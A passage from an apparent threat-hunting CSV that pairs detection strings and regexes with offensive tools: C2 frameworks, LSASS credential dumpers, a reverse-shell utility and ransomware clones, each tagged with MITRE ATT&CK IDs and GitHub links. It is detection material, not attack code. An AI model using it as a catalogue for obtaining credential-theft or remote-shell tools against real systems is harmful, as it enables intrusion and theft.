T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Create %d IP@Loginl;Password*",".{0,1000}Create\s\%d\sIP\@Loginl\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*Create a raw socket to listen for ICMP packets cause f scappy we don't need that shit*",".{0,1000}Create\sa\sraw\ssocket\sto\slisten\sfor\sICMP\spackets\scause\sf\sscappy\swe\sdon\'t\sneed\sthat\sshit.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*CREATE DATABASE C2;*",".{0,1000}CREATE\sDATABASE\sC2\;.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*CREATE DATABASE jasmin_db*",".{0,1000}CREATE\sDATABASE\sjasmin_db.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*CREATE TABLE [LDAPHUNTERFINDINGS]*",".{0,1000}CREATE\sTABLE\s\[LDAPHUNTERFINDINGS\].{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*create_dummy_dll_file*",".{0,1000}create_dummy_dll_file.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*create_nemesis_db(*",".{0,1000}create_nemesis_db\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*create_nemesis_db_pool(*",".{0,1000}create_nemesis_db_pool\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*create_protected_process_as_user*",".{0,1000}create_protected_process_as_user.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Create-ADelegReport*",".{0,1000}Create\-ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*create-aws-instance.py*",".{0,1000}create\-aws\-instance\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*CreateC2Dialog.*",".{0,1000}CreateC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*CreateC2Server*",".{0,1000}CreateC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Created directory for PME at *",".{0,1000}Created\sdirectory\sfor\sPME\sat\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*createdaisypayload*",".{0,1000}createdaisypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreateFile(""twin.txt""*",".{0,1000}CreateFile\(\""twin\.txt\"".{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Create-HotKeyLNK.json*",".{0,1000}Create\-HotKeyLNK\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*createlinuxpayload*",".{0,1000}createlinuxpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Create-MultipleSessions.ps1*",".{0,1000}Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Create-NamedPipe*",".{0,1000}Create\-NamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*createnewpayload*",".{0,1000}createnewpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createnewshellcode*",".{0,1000}createnewshellcode.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createpbindpayload*",".{0,1000}createpbindpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreateProcessAsUser*",".{0,1000}CreateProcessAsUser.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*createproxypayload -*",".{0,1000}createproxypayload\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createproxypayload*",".{0,1000}createproxypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreatePseudoConsole function found! Spawning a fully interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\sfound!\sSpawning\sa\sfully\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*CreatePseudoConsole function not found! Spawning a netcat-like interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\snot\sfound!\sSpawning\sa\snetcat\-like\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*CreateStringPayload(""RULER"")*",".{0,1000}CreateStringPayload\(\""RULER\""\).{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*Create-SuspendedWinLogon*",".{0,1000}Create\-SuspendedWinLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*CreateTokenClient.exe *",".{0,1000}CreateTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*CreateTokenDrv_x64.sys*",".{0,1000}CreateTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Create-WinLogonProcess*",".{0,1000}Create\-WinLogonProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Creating a TGT ticket for the user*",".{0,1000}Creating\sa\sTGT\sticket\sfor\sthe\suser.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Creating DigitalOcean OVPN Proxy tab*",".{0,1000}Creating\sDigitalOcean\sOVPN\sProxy\stab.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*Creating offline copies of the LSASS process to perform memory dumps on*",".{0,1000}Creating\soffline\scopies\sof\sthe\sLSASS\sprocess\sto\sperform\smemory\sdumps\son.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*credBandit * output*",".{0,1000}credBandit\s.{0,1000}\soutput.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBandit.*",".{0,1000}credBandit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBanditx64*",".{0,1000}credBanditx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*creddump.py*",".{0,1000}creddump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Credential Guard bypass might fail if RunAsPPL is enabled*",".{0,1000}Credential\sGuard\sbypass\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*",".{0,1000}CredentialAccess_CredentialDumping_BrowserDataCSharp\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_KiwiOnLocal.py*",".{0,1000}CredentialAccess_CredentialDumping_KiwiOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 